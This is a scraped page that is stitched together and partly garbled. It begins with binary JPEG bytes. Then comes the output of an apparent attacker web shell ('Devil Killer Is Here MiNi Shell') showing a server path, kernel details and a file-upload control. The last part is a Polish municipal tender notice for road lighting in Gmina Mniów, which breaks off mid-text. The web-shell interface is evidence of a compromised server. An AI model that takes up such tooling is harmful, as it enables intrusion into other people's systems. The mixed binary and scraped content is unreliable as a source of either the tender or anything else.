JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210720/0012085101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00120851 z dnia 2021-07-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> "Budowa oświetlenia drogowego w miejscowościach na terenie Gminy Mniów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mniów</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Urząd Gminy Mniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010346</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Centralna 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 373-70-02</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">41 373-70-24</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mniow.biuletyn.net/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "Budowa oświetlenia drogowego w miejscowościach na terenie Gminy Mniów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc4e196c-e937-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00120851</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00090094/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 "Budowa oświetlenia drogowego w miejscowościach na terenie Gminy Mniów”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mniow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mniow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1 W<br/>przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>1.1 Elektronicznie na adres e-mail: zamowienia@mniow.pl lub za pośrednictwem Platformy znajdującej<br/>się pod adresem: https://mniow.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>3 Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 8 niniejszego Rozdziału;<br/>3.1 głoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy<br/>Mniów; mniow.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>3.2 Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>3.3 Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w<br/>postaci elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu<br/>podanym w ww. potwierdzeniu.<br/>3.4 Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za<br/>pośrednictwem zakładki „Korespondencja”.<br/>4 Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek<br/>należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu<br/>zakładki „Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlaneprzyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić<br/>dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy "Pytanie wysłane".<br/>Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu<br/>składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie<br/>później niż na 4 dni przed upływem terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści SWZ<br/>wpłynie po upływie terminu, o którym mowa powyżej, lub dotyczy udzielonych wyjaśnień, Zamawiający<br/>może udzielić wyjaśnień albo pozostawić wniosek bez rozpoznania. Przedłużenie terminu składania<br/>ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.<br/>5 Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu<br/>modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem Platformy Zakupowej.<br/>6 Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami<br/>korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania<br/>teleinformatycznego Platformy zakupowej Gminy Mniów tel. +48 22 257 22 23 (infolinia dostępna w dni<br/>robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1 Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13<br/>ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych), dalej „RODO”, Zamawiający informuje, że:<br/>1.1 administratorem Państwa danych osobowych jest Gmina Mniów, ul Centralna 9, tel. 41 3737002 ;<br/>1.2 administrator wyznaczył Inspektora Danych Osobowych, adres<br/>e-mail: iod@mniow.pl<br/>1.3 Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, które jest prowadzone<br/>w trybie podstawowym na podstawie art. 275 pkt 1 ustawy z dnia 11 września 2019 r. - Prawo<br/>zamówień publicznych;<br/>1.4 odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 PZP;<br/>1.5 Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 PZP);<br/>1.6 obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest<br/>wymogiem określonym w przepisach PZP, związanym z udziałem w niniejszym postępowaniu;<br/>1.7 w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do postanowień art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.8.1 zgodnie z art. 15 RODO - prawo dostępu do danych<br/>osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa<br/>wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo<br/>sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>1.8.2 zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlanezamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może<br/>naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>1.8.3 zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>1.8.4 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają<br/>Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy RODO;<br/>1.9 nie przysługuje Państwu:<br/>1.9.1 zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>1.9.2 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3 zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKPiB.VI.271.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 1 - „Budowa oświetlenia drogowego w msc. Gliniany Las”<br/>W ramach zadania nr 1 (Gliniany Las) przewidziano do wykonania m. in.: <br/>1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/6 w ilości 1 szt. <br/> 2) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 5 szt. <br/>3) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10 w ilości 6 szt. <br/>4) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego o długości ok. 597 m wykonanej przewodem AsXSn 2x25 mm², <br/> 5) montaż wysięgników oprawy oświetlenia drogowego – 7 szt. <br/>6) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 50 W na wysięgniku – 7 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 2 - „Budowa oświetlenia drogowego w msc. Mniów ul. Kielecka”<br/>W ramach zadania nr 2 (Mniów ul. Kielecka) przewidziano do wykonania m. in.: 1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 5 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10 w ilości 3 szt. <br/>3) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego o długości ok. 380 m wykonanej przewodem AsXSn 2x25 mm², <br/>4) montaż wysięgników oprawy oświetlenia drogowego – 4 szt. <br/>5) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 100 W na wysięgniku – 4 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu 